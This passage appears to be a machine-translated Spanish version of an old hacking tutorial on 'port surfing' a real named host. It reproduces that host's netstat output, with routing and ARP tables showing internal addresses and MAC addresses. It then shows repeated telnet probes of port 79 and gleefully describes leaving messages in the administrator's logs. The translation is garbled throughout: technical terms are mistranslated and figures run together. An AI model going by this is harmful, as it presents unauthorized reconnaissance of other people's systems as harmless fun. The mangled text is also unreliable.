0 0 * (FS) * (*) ESCUCHEUDP 0 0 * (NameService) * (*)UDP 0 0 127.0.0.1 (NameService) * (*)UDP 0 0 GRANDE.NM.OR (NAMESERV) * (*)UDP 0 0 * (TFTP) * (*)UDP 0 0 * (bootps) * (*)UDP 0 0 * (Kerberos) * (*)UDP 0 0 127.0.0.1 (Kerberos) * (*)UDP 0 0 GRANDE.NM.OR (Kerberos) * (*)UDP 0 0 * (*) * (*)UDP 0 0 * (SNMP) * (*)UDP 0 0 * (RPC) * (*)UDP 0 0 * (durante el da) * (*)UDP 0 0 * (ECHO) * (*)UDP 0 0 * (DESCARTAR) * (*)UDP 0 0 * (TIME) * (*)UDP 0 0 * (CHARGEN) * (*)UDP 0 0 * (hablar) * (*)UDP 0 0 * (ntalk) * (*)UDP 0 0 * (1023) * (*)UDP 0 0 * (XDMCP) * (*)MultiNet registrado programas RPC:Versin Programa Portuario Protocolo------- ------- -------- ----Portmap 2 TCP 111Portmap 2 UDP 111Mesas MultiNet IP Routing:Destino Banderas de Gateway refcnt Uso Interface MTU---------- ---------- ----- ------ ----- --------- ----198.59.167.1 LAWRII.NM.ORG arriba, Gateway, H 0 2 SE0 1500166.45.0.1 ENSS365.NM.ORG arriba, Gateway, H 0 4162 SE0 1500205.138.138.1 ENSS365.NM.ORG arriba, Gateway, H 0 71 SE0 1500204.127.160.1 ENSS365.NM.ORG arriba, Gateway, H 0 298 SE0 1500127.0.0.1 127.0.0.1 para arriba, Host 5 1183513 lo0 4136198.59.167.2 LAWRII.NM.ORG arriba, Gateway, H 0 640 SE0 1500192.132.89.2 ENSS365.NM.ORG arriba, Gateway, H 0 729 SE0 1500207.77.56.2 ENSS365.NM.ORG arriba, Gateway, H 0 5 SE0 1500204.97.213.2 ENSS365.NM.ORG arriba, Gateway, H 0 2641 SE0 1500194.90.74.66 ENSS365.NM.ORG arriba, Gateway, H 0 1 SE0 1500204.252.102.2 ENSS365.NM.ORG arriba, Gateway, H 0 109 SE0 1500205.160.243.2 ENSS365.NM.ORG arriba, Gateway, H 0 78 SE0 1500202.213.4.2 ENSS365.NM.ORG arriba, Gateway, H 0 4 SE0 1500202.216.224.66 ENSS365.NM.ORG arriba, Gateway, H 0 113 SE0 1500192.132.89.3 ENSS365.NM.ORG arriba, Gateway, H 0 1100 SE0 1500198.203.196.67 ENSS365.NM.ORG arriba, Gateway, H 0 385 SE0 1500160.205.13.3 ENSS365.NM.ORG arriba, Gateway, H 0 78 SE0 1500202.247.107.131 ENSS365.NM.ORG arriba, Gateway, H 0 19 SE0 1500198.59.167.4 LAWRII.NM.ORG arriba, Gateway, H 0 82 SE0 1500128.148.157.6 ENSS365.NM.ORG arriba, Gateway, H 0 198 SE0 1500160.45.10.6 ENSS365.NM.ORG arriba, Gateway, H 0 3 SE0 1500128.121.50.7 ENSS365.NM.ORG arriba, Gateway, H 0 3052 SE0 1500206.170.113.8 ENSS365.NM.ORG arriba, Gateway, H 0 1451 SE0 1500128.148.128.9 ENSS365.NM.ORG arriba, Gateway, H 0 1122 SE0 1500203.7.132.9 ENSS365.NM.ORG arriba, Gateway, H 0 14 SE0 1500204.216.57.10 ENSS365.NM.ORG arriba, Gateway, H 0 180 SE0 1500130.74.1.75 ENSS365.NM.ORG arriba, Gateway, H 0 10117 SE0 1500206.68.65.15 ENSS365.NM.ORG arriba, Gateway, H 0 249 SE0 1500129.219.13.81 ENSS365.NM.ORG arriba, Gateway, H 0 547 SE0 1500204.255.246.18 ENSS365.NM.ORG arriba, Gateway, H 0 1125 SE0 1500160.45.24.21 ENSS365.NM.ORG arriba, Gateway, H 0 97 SE0 1500206.28.168.21 ENSS365.NM.ORG arriba, Gateway, H 0 2093 SE0 1500163.179.3.222 ENSS365.NM.ORG arriba, Gateway, H 0 315 SE0 1500198.109.130.33 ENSS365.NM.ORG arriba, Gateway, H 0 1.825 SE0 1500199.224.108.33 ENSS365.NM.ORG arriba, Gateway, H 0 11362 SE0 1500203.7.132.98 ENSS365.NM.ORG arriba, Gateway, H 0 73 SE0 1500198.111.253.35 ENSS365.NM.ORG arriba, Gateway, H 0 1134 SE0 1500206.149.24.100 ENSS365.NM.ORG arriba, Gateway, H 0 3397 SE0 1500165.212.105.106 ENSS365.NM.ORG arriba, Gateway, H 0 17 SE0 1006205.238.3.241 ENSS365.NM.ORG arriba, Gateway, H 0 69 SE0 1500198.49.44.242 ENSS365.NM.ORG arriba, Gateway, H 0 25 SE0 1500194.22.188.242 ENSS365.NM.ORG arriba, Gateway, H 0 20 SE0 1500164.64.0 LAWRII.NM.ORG arriba, puerta de enlace 1 40377 SE0 15000.0.0 ENSS365.NM.ORG arriba, Gateway 2 4728741 SE0 1500207.66.1 GLORY.NM.ORG arriba, puerta de enlace 0 51 SE0 1500205.166.1 GLORY.NM.ORG arriba, puerta de enlace 0 1978 SE0 1500204.134.1 LAWRII.NM.ORG arriba, puerta de enlace 0 54 SE0 1500204.134.2 GLORY.NM.ORG arriba, puerta de enlace 0 138 SE0 1500192.132.2 129.121.248.1 para arriba, puerta de enlace 0 6345 SE0 1500204.134.67 GLORY.NM.ORG arriba, puerta de enlace 0 2022 SE0 1500206.206.67 GLORY.NM.ORG arriba, puerta de enlace 0 7778 SE0 1500206.206.68 LAWRII.NM.ORG arriba, puerta de enlace 0 3185 SE0 1500207.66.5 GLORY.NM.ORG arriba, puerta de enlace 0 626 SE0 1500204.134.69 GLORY.NM.ORG arriba, puerta de enlace 0 7990 SE0 1500207.66.6 GLORY.NM.ORG arriba, puerta de enlace 0 53 SE0 1500204.134.70 LAWRII.NM.ORG arriba, puerta de enlace 0 18011 SE0 1500192.188.135 GLORY.NM.ORG arriba, puerta de enlace 0 5 SE0 1500206.206.71 LAWRII.NM.ORG arriba, puerta de enlace 0 2 SE0 1500204.134.7 GLORY.NM.ORG arriba, puerta de enlace 0 38 SE0 1500199.89.135 GLORY.NM.ORG arriba, puerta de enlace 0 99 SE0 1500198.59.136 LAWRII.NM.ORG arriba, puerta de enlace 0 1293 SE0 1500204.134.9 GLORY.NM.ORG arriba, puerta de enlace 0 21 SE0 1500204.134.73 GLORY.NM.ORG arriba, puerta de enlace 0 59794 SE0 1500129.138.0 GLORY.NM.ORG arriba, puerta de enlace 0 5262 SE0 1500192.92.10 LAWRII.NM.ORG arriba, puerta de enlace 0 163 SE0 1500206.206.75 LAWRII.NM.ORG arriba, puerta de enlace 0 604 SE0 1500207.66.13 GLORY.NM.ORG arriba, puerta de enlace 0 1184 SE0 1500204.134.77 LAWRII.NM.ORG arriba, puerta de enlace 0 3649 SE0 1500207.66.14 GLORY.NM.ORG arriba, puerta de enlace 0 334 SE0 1500204.134.78 GLORY.NM.ORG arriba, puerta de enlace 0 239 SE0 1500204.52.207 GLORY.NM.ORG arriba, puerta de enlace 0 293 SE0 1500204.134.79 GLORY.NM.ORG arriba, puerta de enlace 0 1294 SE0 1500192.160.144 LAWRII.NM.ORG arriba, puerta de enlace 0 117 SE0 1500206.206.80 PENNY.NM.ORG arriba, puerta de enlace 0 4663 SE0 1500204.134.80 GLORY.NM.ORG arriba, puerta de enlace 0 91 SE0 1500198.99.209 LAWRII.NM.ORG arriba, puerta de enlace 0 1136 SE0 1500207.66.17 GLORY.NM.ORG arriba, puerta de enlace 0 24173 SE0 1500204.134.82 GLORY.NM.ORG arriba, puerta de enlace 0 29766 SE0 1500192.41.211 GLORY.NM.ORG arriba, puerta de enlace 0 155 SE0 1500192.189.147 LAWRII.NM.ORG arriba, puerta de enlace 0 3133 SE0 1500204.134.84 PENNY.NM.ORG arriba, puerta de enlace 0 189 SE0 1500204.134.87 LAWRII.NM.ORG arriba, puerta de enlace 0 94 SE0 1500146.88.0 GLORY.NM.ORG arriba, puerta de enlace 0 140 SE0 1500192.84.24 GLORY.NM.ORG arriba, puerta de enlace 0 3530 SE0 1500204.134.88 LAWRII.NM.ORG arriba, puerta de enlace 0 136 SE0 1500198.49.217 GLORY.NM.ORG arriba, puerta de enlace 0 303 SE0 1500192.132.89 GLORY.NM.ORG arriba, puerta de enlace 0 3513 SE0 1500198.176.219 GLORY.NM.ORG arriba, puerta de enlace 0 1278 SE0 1500206.206.92 LAWRII.NM.ORG arriba, puerta de enlace 0 1228 SE0 1500192.234.220 129.121.1.91 para arriba, puerta de enlace 0 2337 SE0 1500204.134.92 LAWRII.NM.ORG arriba, puerta de enlace 0 13995 SE0 1500198.59.157 LAWRII.NM.ORG arriba, puerta de enlace 0 508 SE0 1500206.206.93 GLORY.NM.ORG arriba, puerta de enlace 0 635 SE0 1500204.134.93 GLORY.NM.ORG arriba, puerta de enlace 0 907 SE0 1500198.59.158 LAWRII.NM.ORG arriba, puerta de enlace 0 14214 SE0 1500198.59.159 LAWRII.NM.ORG arriba, puerta de enlace 0 1806 SE0 1500204.134.95 PENNY.NM.ORG arriba, puerta de enlace 0 3644 SE0 1500206.206.96 GLORY.NM.ORG arriba, puerta de enlace 0 990 SE0 1500206.206.161 LAWRII.NM.ORG arriba, puerta de enlace 0 528 SE0 1500198.59.97 PENNY.NM.ORG arriba, puerta de enlace 0 55 SE0 1500198.59.161 LAWRII.NM.ORG arriba, puerta de enlace 0 497 SE0 1500192.207.226 GLORY.NM.ORG arriba, puerta de enlace 0 93217 SE0 1500198.59.99 PENNY.NM.ORG arriba, puerta de enlace 0 2 SE0 1500198.59.163 GLORY.NM.ORG arriba, puerta de enlace 0 3379 SE0 1500192.133.100 LAWRII.NM.ORG arriba, puerta de enlace 0 3649 SE0 1500204.134.100 GLORY.NM.ORG arriba, puerta de enlace 0 8 SE0 1500128.165.0 PENNY.NM.ORG arriba, puerta de enlace 0 15851 SE0 1500198.59.165 GLORY.NM.ORG arriba, puerta de enlace 0 274 SE0 1500206.206.165 LAWRII.NM.ORG arriba, puerta de enlace 0 167 SE0 1500206.206.102 GLORY.NM.ORG arriba, puerta de enlace 0 5316 SE0 1500160.230.0 LAWRII.NM.ORG arriba, puerta de enlace 0 19408 SE0 1500206.206.166 LAWRII.NM.ORG arriba, puerta de enlace 0 1756 SE0 1500205.166.231 GLORY.NM.ORG arriba, puerta de enlace 0 324 SE0 1500198.59.167 GLORY.NM.ORG arriba, puerta de enlace 0 1568 SE0 1500206.206.103 GLORY.NM.ORG arriba, puerta de enlace 0 3629 SE0 1500198.59.168 GLORY.NM.ORG arriba, puerta de enlace 0 9063 SE0 1500206.206.104 GLORY.NM.ORG arriba, puerta de enlace 0 7333 SE0 1500206.206.168 GLORY.NM.ORG arriba, puerta de enlace 0 234 SE0 1500204.134.105 LAWRII.NM.ORG arriba, puerta de enlace 0 4826 SE0 1500206.206.105 LAWRII.NM.ORG arriba, puerta de enlace 0 422 SE0 1500204.134.41 LAWRII.NM.ORG arriba, puerta de enlace 0 41782 SE0 1500206.206.169 GLORY.NM.ORG arriba, puerta de enlace 0 5101 SE0 1500204.134.42 GLORY.NM.ORG arriba, puerta de enlace 0 10.761 SE0 1500206.206.170 GLORY.NM.ORG arriba, puerta de enlace 0 916 SE0 1500198.49.44 GLORY.NM.ORG arriba, puerta de enlace 0 3 SE0 1500198.59.108 GLORY.NM.ORG arriba, puerta de enlace 0 2129 SE0 1500204.29.236 GLORY.NM.ORG arriba, puerta de enlace 0 125 SE0 1500206.206.172 GLORY.NM.ORG arriba, puerta de enlace 0 5839 SE0 1500204.134.108 GLORY.NM.ORG arriba, puerta de enlace 0 3216 SE0 1500206.206.173 GLORY.NM.ORG arriba, puerta de enlace 0 374 SE0 1500198.175.173 LAWRII.NM.ORG arriba, puerta de enlace 0 6227 SE0 1500198.59.110 GLORY.NM.ORG arriba, puerta de enlace 0 1797 SE0 1500198.51.238 GLORY.NM.ORG arriba, puerta de enlace 0 1356 SE0 1500192.136.110 GLORY.NM.ORG arriba, puerta de enlace 0 583 SE0 1500204.134.48 GLORY.NM.ORG arriba, puerta de enlace 0 42 SE0 1500198.175.176 LAWRII.NM.ORG arriba, puerta de enlace 0 32 SE0 1500206.206.114 LAWRII.NM.ORG arriba, puerta de enlace 0 44 SE0 1500206.206.179 LAWRII.NM.ORG arriba, puerta de enlace 0 14 SE0 1500198.59.179 PENNY.NM.ORG arriba, puerta de enlace 0 222 SE0 1500198.59.115 GLORY.NM.ORG arriba, puerta de enlace 1 132 886 1500 SE0206.206.181 GLORY.NM.ORG arriba, puerta de enlace 0 1354 SE0 1500206.206.182 SIENNA.NM.ORG arriba, puerta de enlace 0 16 SE0 1500206.206.118 GLORY.NM.ORG arriba, puerta de enlace 0 3423 SE0 1500206.206.119 GLORY.NM.ORG arriba, puerta de enlace 0 282 SE0 1500206.206.183 SIENNA.NM.ORG arriba, puerta de enlace 0 2473 SE0 1500143.120.0 LAWRII.NM.ORG arriba, puerta de enlace 0 123533 SE0 1500206.206.184 GLORY.NM.ORG arriba, puerta de enlace 0 1114 SE0 1500205.167.120 GLORY.NM.ORG arriba, puerta de enlace 0 4202 SE0 1500206.206.121 GLORY.NM.ORG arriba, puerta de enlace 1 71 SE0 1500129.121.0 GRANDE.NM.ORG Hasta 12 21658599 SE0 1500204.134.122 GLORY.NM.ORG arriba, puerta de enlace 0 195 SE0 1500204.134.58 GLORY.NM.ORG arriba, puerta de enlace 0 7707 SE0 1500128.123.0 GLORY.NM.ORG arriba, puerta de enlace 0 34416 SE0 1500204.134.59 GLORY.NM.ORG arriba, puerta de enlace 0 1007 SE0 1500204.134.124 GLORY.NM.ORG arriba, puerta de enlace 0 37160 SE0 1500206.206.124 LAWRII.NM.ORG arriba, puerta de enlace 0 79 SE0 1500206.206.125 PENNY.NM.ORG arriba, puerta de enlace 0 233359 SE0 1500204.134.126 GLORY.NM.ORG arriba, puerta de enlace 0 497 SE0 1500206.206.126 LAWRII.NM.ORG arriba, puerta de enlace 0 13644 SE0 1500204.69.190 GLORY.NM.ORG arriba, puerta de enlace 0 4059 SE0 1500206.206.190 GLORY.NM.ORG arriba, puerta de enlace 0 1630 SE0 1500204.134.127 GLORY.NM.ORG arriba, puerta de enlace 0 45621 SE0 1500206.206.191 GLORY.NM.ORG arriba, puerta de enlace 0 3574 SE0 1500Mesas MultiNet IPX Routing:Destino Banderas de Gateway refcnt Uso Interface MTU---------- ---------- ----- ------ ----- --------- ----Mesa MultiNet ARP:Anfitrin de direcciones de red Ethernet Direccin Banderas Arp-------------------------------------------- ------ ---------- ---------GLORY.NM.ORG (IP 129.121.1.4) AA: 00: 04: 00: 61: D0 Temporal[Unknown] (IP 129.121.251.1) 00: C0: 05: 01: 2C: D2 TemporalNARANJO.NM.ORG (IP 129.121.1.56) 08: 00: 87: 04: 9F: 42 TemporalCHAMA.NM.ORG (IP 129.121.1.8) AA: 00: 04: 00: 0C: D0 Temporal[Unknown] (IP 129.121.251.5) AA: 00: 04: 00: D2: D0 TemporalLAWRII.NM.ORG (IP 129.121.254.10) AA: 00: 04: 00: 5C: D0 Temporal[Unknown] (IP 129.121.1.91) 00: C0: 05: 01: 2C: D2 TemporalBRAVO.NM.ORG (IP 129.121.1.6) AA: 00: 04: 00: 0B: D0 TemporalPENNY.NM.ORG (IP 129.121.1.10) AA: 00: 04: 00: 5F: D0 TemporalARRIBA.NM.ORG (IP 129.121.1.14) 08: 00: 2B: BC: C1: A7 temporalAZUL.NM.ORG (IP 129.121.1.51) 08: 00: 87: 00: A1: D3 TemporalENSS365.NM.ORG (IP 129.121.1.3) 00: 00: 0C: 51: EF: 58 TemporalAVATAR.NM.ORG (IP 129.121.254.1) 08: 00: 5A: 1D: 52: 0D Temporal[Unknown] (IP 129.121.253.2) 08: 00: 5A: 47: 4A: 1D Temporal[Unknown] (IP 129.121.254.5) 00: C0: 7B: 5F: 5F: 80 TemporalCONCHAS.NM.ORG (IP 129.121.1.11) 08: 00: 5A: 47: 4A: 1D Temporal[Unknown] (IP 129.121.253.10) AA: 00: 04: 00: 4B: D0 TemporalEstadsticas de interfaz de red MultiNet:Nombre Mtu direccin de red Ipkts Ierrs Opkts Oerrs Collis---- --- ------- -------------- ----- ----- ----- ----- - ----SE0 1500 129.121.0 GRANDE.NM.ORG 68.422.948 0 53.492.833 1 0lo0 4136 127.0.0.1 127.0.0 1188191 0 1188191 0 0Estadsticas Protocolo MultiNet:Los paquetes IP recibidos 6526417322 IP paquetes ms pequeos que el tamao mnimo6928 fragmentos IP recibidos4 fragmentos IP timed out34 IP recibido destinos inalcanzables704140 paquetes de error ICMP generados9667 ICMP cdigos de operacin fuera de rango4170 Mala ICMP sumas de control de paquetes734363 respuestas ICMP734363 ICMP paquetes "Echo" recibidos734363 ICMP paquetes "Echo Reply" enviados18339 ICMP paquetes "Echo Reply" recibidos704140 ICMP "destino inalcanzable" paquetes enviados451243 ICMP "destino inalcanzable" paquetes recibidos1488 ICMP paquetes "Fuente Quench" recibidos163911 ICMP paquetes "redirigir" recibidos189732 ICMP "Tiempo" Super paquetes recibidos126966 conexiones TCP iniciada233998 conexiones TCP establecida132611 conexiones TCP aceptadas67972 conexiones TCP cayeron28182 conexiones TCP embrionarias cayeron269399 conexiones TCP cerradas10711838 segmentos TCP programado para RTT10505140 segmentos TCP actualizan RTT3927264 TCP retrasado ACKs enviados666 conexiones TCP cayeron debido a retransmitir los tiempos de espera111040 tiempos de espera de retransmisin TCP3136 TCP persisten los tiempos de espera9 TCP persisten gotas de conexin16850 TCP tiempos de espera de keepalive1195 sondas keepalive TCP enviados14392 conexiones TCP cayeron debido a los tiempos de espera KEEPALIVE28842663 paquetes TCP enviados12714484 paquetes de datos TCP enviados1206060086 bytes de datos TCP enviados58321 paquetes de datos TCP retransmitido22144036 bytes de datos TCP retransmitidas6802199 TCP ACK-slo los paquetes enviados1502 sondas de ventana TCP enviados483 TCP URG-slo los paquetes enviados8906175 TCP paquetes slo Ventana-update-enviados359509 paquetes de control TCP enviados38675084 paquetes TCP recibidos28399363 paquetes TCP recibidos en secuencia1929418386 bytes TCP recibidos en secuencia25207 paquetes TCP con errores de suma de comprobacin273374 paquetes TCP eran duplicados230525708 bytes TCP eran duplicados3748 paquetes TCP tenan algunos bytes duplicados493214 bytes TCP eran duplicados parciales2317156 paquetes TCP estaban fuera de servicio3151204672 bytes TCP estaban fuera de servicio1915 paquetes TCP tenan datos despus de la ventana865443 bytes TCP buscaban ventana5804 paquetes TCP para conexin ya cerrado941 paquetes TCP eran sondas ventana10847459 paquetes TCP ACK tenan222657 paquetes TCP tenan ACKs duplicados1 paquete TCP ACKed datos sin enviar1200274739 bytes TCP acked141545 paquetes TCP tenan actualizaciones ventana13 segmentos TCP cayeron debido a PAWS4658158 segmentos TCP se predijo pura-ACK24033756 segmentos TCP se predijo-data pura8087980 TCP fallos de cach PCB305 Bad sumas de comprobacin de cabecera UDP17 campos de longitud de datos Bad UDP23772272 UDP PCB fallos de cachMultiNet Estadsticas Buffer:388 de 608 amortiguadores en uso:30 buffers asignados a datos.10 buffers de paquetes asignados a las cabeceras.66 buffers asignados a Estructuras socket.57 buffers asignados al Protocolo de Control Blocks.163 buffers asignados a entradas de la tabla de enrutamiento.2 buffers asignados a Socket nombres y direcciones.48 buffers asignados al Kernel Fork-Procesos.2 buffers asignados a Interface Direcciones.1 bfer asignado a las direcciones de multidifusin.1 bfer asignado al tiempo de espera rellamadas.6 buffers asignados a la gestin de memoria.2 buffers asignados a la Red de TTY bloques de control.11 de los 43 grupos de pginas en uso.11 CXBs tomados de los controladores de dispositivos VMS2 CXBs esperando para volver a los controladores de dispositivo VMS162 Kbytes asignados a buffers MultiNet (44% en uso).226 Kbytes de espacio de direcciones bfer asignado (0% del mximo).Conexion cerrada por anfitrion desconocido. [68] ->Whoa!Qu fue todo eso?Lo que hicimos fue telnet al puerto 15 - el puerto: netstat que en algunos equipos se ejecuta un demonio que le dice a alguien que le importa a caer en casi todo lo relacionado con la conexin hecha por todos los ordenadores conectados a Internet a travs de este equipo.As que desde este aprendimos dos cosas:1) Grande.nm.org es un equipo muy ocupado e importante.2) Incluso un equipo muy ocupado e importante puede dejar que el surfista puerto aleatorio ven a jugar.As que mi amiga quera probar otro puerto.Suger el puerto dedo, nmero 79. As que se dio la orden: [68] -> telnet grande.nm.org 79Tratando 129.121.1.2 ...Conectado a grande.nm.org.Carcter de escape es '^]'.dedo? Lo sentimos, no pudo encontrar "DEDO"Conexion cerrada por anfitrion desconocido. [69] -> telnet grande.nm.org 79Tratando 129.121.1.2 ...Conectado a grande.nm.org.Carcter de escape es '^]'.Ayuda? Lo sentimos, no pudo encontrar "AYUDA"Conexion cerrada por anfitrion desconocido. [69] -> telnet grande.nm.org 79Tratando 129.121.1.2 ...Conectado a grande.nm.org.Carcter de escape es '^]'.?? Lo sentimos, no pudo encontrar "?"Conexion cerrada por anfitrion desconocido. [69] -> telnet grande.nm.org 79Tratando 129.121.1.2 ...Conectado a grande.nm.org.Carcter de escape es '^]'.hombre? Lo sentimos, no pudo encontrar "MAN"Conexion cerrada por anfitrion desconocido. [69] ->Al principio esto parece slo un montn de comandos fallidos.Pero en realidad esto es bastante fascinante.La razn es que el puerto 79 es, segn las normas IETF, que se supone para funcionar fingerd, el demonio dedo.As que el comando "dedo" y grande.nm.org cuando dio dijo? Lo sentimos, pero no pudo encontrar "DEDO", sabamos que este puerto no estaba siguiendo normas IETF.Ahora en los ordenadores Que ellos no corren el demonio dedo en absoluto.Esto se debe a que el dedo tiene propiedades por lo que pueden ser utilizados para obtener el control total del equipo que dirige.Pero si el dedo se cierra, y nada ms se est ejecutando en el puerto 79, que woudl obtenemos la respuesta:telnet: connect: Connection refused.Pero en lugar de que nos conectamos y grande.nm.org estaba esperando un comando.Ahora lo normal un surfista puerto hace cuando se ejecuta un daemon unfmiliar es de convencer en revelar lo que los comandos que utiliza."Ayuda", "?" Y "hombre" a menudo funciona.Pero no nos ayud.Pero a pesar de estos comandos no nos ayudan, nos dijeron que el demonio es probablemente algo sensible.Si fuera un demonio que era para nadie y su hermano de usar, que nos habra dado instrucciones.Entonces, qu hacemos ahora?Decidimos ser buenos ciudadanos de Internet y permanecer fuera de la crcel Decidimos que bamos beter cerrar sesin.Pero haba un truco que decidimos hacer primero: dejar nuestra marca en el archivo de registro de la cscara.El archivo de registro de shell mantiene un registro de todos los comandos del sistema operativo hechas en un ordenador.El adminsitrator de un equipo obviamente importante como grande.nm.org es probablemente lo suficientemente competente para examinar los registros de lo que los comandos se dan por quin a su ordenador.Especialmente en un puerto tan importante como para estar ejecutando un misterio, el demonio no IETF.As que todo lo que los tipos mientras conectados se guardan en un registro.As que mi amigo se ri con alegra y dej algunos mensajes en el puerto 79 antes de cerrar la sesin.Oh, querida, creo que est enganchado a la piratera.Hmmm, podra ser una buena manera de conocer a